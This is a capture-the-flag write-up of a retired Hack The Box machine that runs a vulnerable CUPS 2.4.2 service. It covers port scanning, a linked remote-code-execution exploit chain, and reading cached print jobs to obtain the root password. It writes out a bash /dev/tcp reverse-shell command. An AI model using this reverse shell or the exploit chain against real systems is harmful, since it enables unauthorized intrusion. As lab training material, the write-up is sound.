# EvilCPUs (HTB)

## Intro.

Hello my fello friends it been a while since i post something but today we have a reitred HTB machine so we can have some fun here too SHALL WE !?.

***

## Enumeration.

```
PORT    STATE SERVICE REASON         VERSION
22/tcp  open  ssh     syn-ack ttl 63 OpenSSH 9.2p1 Debian 2+deb12u3 (protocol 2.0)
| ssh-hostkey:
|   256 36:49:95:03:8d:b4:4c:6e:a9:25:92:af:3c:9e:06:66 (ECDSA)
| ecdsa-sha2-nistp256 AAAAE2VjZHNhLXNoYTItbmlzdHAyNTYAAAAIbmlzdHAyNTYAAABBBLhyWEKe+YMaLWwGVFwyHt8c6bWzFkIrhtFZYPkBfui0+1IrwnUmA3TZq1yQ9vN7Jn+Id6YxfaXO7CfraX69S/Y=
|   256 9f:a4:a9:39:11:20:e0:96:ee:c4:9a:69:28:95:0c:60 (ED25519)
|_ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAICsRxZMgAIyL7cg9PIv83wIGkMGjzbkzS1jktKqQ6Kij
631/tcp open  ipp     syn-ack ttl 63 CUPS 2.4
|_http-title: Bad Request - CUPS v2.4.2
```

So from this results we can see an uncomment port which is 631 let's see what it has.

### Enumerate port 631.

So a quich search we can find that this port is an ( Internet Printing Protocol) which am not so familiar with it.

{% embed url="<https://book.hacktricks.xyz/network-services-pentesting/pentesting-631-internet-printing-protocol-ipp>" %}

{% hint style="info" %}
So after some reading an.\
\
IPP : is a protocol uses HTTP post request to print over the network and manage the printer like shown status and more.\
\
CPUS (Common Unix Printing System): is an  open source project which allows a computer to act as a printer for a unix based system and it is using IPP as its communication protocol
{% endhint %}

### Getting shell.

So after a lot of search i found that the version of CUPs if vuln to a chain of attacks which results in RCE.

{% embed url="<https://www.evilsocket.net/2024/09/26/Attacking-UNIX-systems-via-CUPS-Part-I/#Summary>" %}

{% embed url="<https://github.com/IppSec/evil-cups/blob/main/evilcups.py>" %}

Thanks to these guys we are able to understand and exploit the vulnerable service and give a remote  code execution.

<figure><img src="https://616326001-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fi149KGmTZ4nvE4TuOMXm%2Fuploads%2FXV1z67nSK7JX11N0KLVT%2Fimage.png?alt=media&#x26;token=85094526-204b-467e-920c-cd6ed1320658" alt=""><figcaption></figcaption></figure>

Running this command will advertises an evil printer which going to be added to our printers in the website.

<figure><img src="https://616326001-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fi149KGmTZ4nvE4TuOMXm%2Fuploads%2FzjDw1rko1dGDzSVE9WzU%2Fimage.png?alt=media&#x26;token=72107dc1-224f-418c-afe4-a770333d5f25" alt=""><figcaption></figcaption></figure>

so pressing on this printer and test it our command will be executed.

<figure><img src="https://616326001-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fi149KGmTZ4nvE4TuOMXm%2Fuploads%2FntqXs44hFBp8mT3RO5AM%2Fimage.png?alt=media&#x26;token=6598f513-2ba6-4773-9cda-938a259522ae" alt=""><figcaption></figcaption></figure>

<figure><img src="https://616326001-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fi149KGmTZ4nvE4TuOMXm%2Fuploads%2FTonwX22H5txhTJ3kP4C8%2Fimage.png?alt=media&#x26;token=c64b6e7f-4756-4d09-ad96-895e28aba084" alt=""><figcaption></figcaption></figure>

and by then we should revive a connection from the machine.

<figure><img src="https://616326001-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fi149KGmTZ4nvE4TuOMXm%2Fuploads%2FScdUizox1nL0d6M2XyJD%2Fimage.png?alt=media&#x26;token=204210c8-dd39-45ea-8c51-119bc594a1ee" alt=""><figcaption></figcaption></figure>

### Stable shell.

i face a problem where it would kill the shell in some period of time to solve this we can use *nohub* command and *&* as follow.

```
'nohub bash -c "bash -i >& /dev/tcp/<VPN-IP>/<PORT> 0>&1" &'
```

{% embed url="<https://en.wikipedia.org/wiki/Nohup>" %}

{% hint style="info" %}
simple explain of *nohub.* nohup is a [POSIX](https://en.wikipedia.org/wiki/POSIX) command which means "no hang up". Its purpose is to execute a command such that it ignores the [HUP](https://en.wikipedia.org/wiki/SIGHUP) (hangup) signal and therefore does not stop when the user logs out.

{% endhint %}

## getting root.

so once we are in the machine we can see that the folder */var/spool/cpus* which has the available printers, does not allow us to list so what we can do. after some search i found that we maybe able to guess the name of a cached job and read its content so what is the format of the cached jobs.

```
d<5 print number>-<3 page>
```

so from my understanding i think it refers to print number as a printer number and page is how many page it prints so let's test this.

and after some tries i get it.

<figure><img src="https://616326001-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fi149KGmTZ4nvE4TuOMXm%2Fuploads%2FgyDM5PKul6yXFKq0oQIN%2Fimage.png?alt=media&#x26;token=2d287029-f80a-483e-ae2f-5366efa29d9b" alt=""><figcaption></figcaption></figure>

am not sure if this was luck or it just the how it should be. but how care we get it. And in the file we would also see the password for the root user.

<figure><img src="https://616326001-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fi149KGmTZ4nvE4TuOMXm%2Fuploads%2Fx3EIDoF1v70km0ONeC9U%2Fimage.png?alt=media&#x26;token=219a7efd-314f-46e1-9ca4-8adf11d26e5a" alt=""><figcaption></figcaption></figure>

using this password are able to login as root.&#x20;

<figure><img src="https://616326001-files.gitbook.io/~/files/v0/b/gitbook-x-prod.appspot.com/o/spaces%2Fi149KGmTZ4nvE4TuOMXm%2Fuploads%2FCIZXjjmCzoYsP4TO5RWN%2Fimage.png?alt=media&#x26;token=3335cdff-3d51-4745-95de-711915d151d7" alt=""><figcaption></figcaption></figure>

## Conclusion.

This machine was quite fun and interesting but the only issue the connection i faced a lot of connection issue but we get it at the end so fun. :relaxed: